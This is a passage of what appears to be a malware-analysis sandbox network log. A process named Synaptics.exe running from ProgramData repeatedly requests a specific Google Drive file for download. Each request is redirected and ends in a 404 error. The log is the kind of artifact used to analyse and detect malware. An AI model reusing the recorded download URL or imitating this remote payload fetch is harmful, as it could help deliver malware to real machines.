                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
2025-01-02 19:29:44 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2025-01-02 19:29:44 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="1_cU6Tf_Zf1oCuqXsmcq0w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2025-01-02 19:29:44 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.9 | 49865 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:43 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
2025-01-02 19:29:44 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:44 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-pwMXQ9svkLW6zs1UEglMGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.9 | 49872 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:43 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
2025-01-02 19:29:44 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC58GSHqt-Htrb-a5D6tAo-fhb8HmgGAS5EveCdfiDCsgm3oShiyBaRLe8zfKgixWfxK
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:44 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-vd6-Qw0tB3IIU80raDPXmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
2025-01-02 19:29:44 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2025-01-02 19:29:44 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="9PpFFgKPvwmZokTNYv2U5g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2025-01-02 19:29:44 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.9 | 49868 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:43 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
2025-01-02 19:29:44 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:44 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-QSLfjXgWWzUKVzOC3KJ2nw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            26 | 192.168.2.9 | 49890 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:45 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:45 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:45 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-qZCPrQU7TdHZ6b-Nm-vJPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            27 | 192.168.2.9 | 49891 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:45 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:45 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:45 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-ge6vNa-X5qq1s72LBsnZTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            28 | 192.168.2.9 | 49900 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:46 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:47 UTC | 1242 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC4ygYu82zC6obV2S2DYWnux_uAmtqMldNyUUubAJgmQ5J715FfIc2a2f3FbVjv2EKg
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:46 GMT
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Be2qfYJvuWOeXiKZwBzKzw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:47 UTC | 148 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not
                                                                                            2025-01-02 19:29:47 UTC | 1390 | IN | Data Ascii: Found)!!1</title><style nonce="pu4w0mJ0SVJOOrsIy3MWxw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:
                                                                                            2025-01-02 19:29:47 UTC | 114 | IN | Data Ascii: Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            29 | 192.168.2.9 | 49903 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:46 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:47 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC7pq1dpBb_fa2D5EzVrDu9ZveZfW3d9tPeBedSfsnqUB99CAj65tplMkp56UW6l0dSp
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:46 GMT
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-T99BGiUP7RhfuJ2hfh_iHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:47 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:29:47 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="Hbzez5fzU6etV0XQnpNvcg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:29:47 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            30 | 192.168.2.9 | 49902 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:46 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:46 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:46 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-CFZbEpC5CKH1YjIcQH1Myg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            31 | 192.168.2.9 | 49901 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:46 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:47 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:46 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-lj8rnv9oGDdXgMZBC923Wg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            32 | 192.168.2.9 | 49910 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:47 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
2025-01-02 19:29:48 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:47 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-mlJv8oSRDJdVa0DmFjjiEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.9 | 49911 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:47 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
2025-01-02 19:29:48 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC7mxnI5ydwAYFyere2_4MlGs8Wqb9AOQZs4BJasRe8jFiqmKw38uEoUi6ilvhBZev6O
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:47 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-bKALfDcY-nvlGkO6-JPvlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
